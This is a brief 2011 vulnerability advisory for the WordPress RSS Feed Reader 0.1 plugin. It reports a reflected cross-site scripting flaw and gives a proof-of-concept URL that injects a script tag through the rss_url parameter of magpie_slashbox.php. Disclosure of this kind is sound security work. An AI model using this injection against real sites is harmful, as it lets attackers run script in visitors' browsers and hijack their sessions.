WordPress RSS Feed Reader for WordPress 0.1 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................WordPress RSS Feed Reader for WordPress 0.1
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://pleer.co.uk/wordpress/plugins/rss-feed-reader
Discovery Date..........1/23/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in WordPress RSS Feed
Reader for WordPress 0.1 can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/wordpress/wp-content/plugins/rss-feed-reader/magpie/scripts/magpie_slashbox.php?rss_url=%3Cscript%3Ealert(0)%3C/script%3E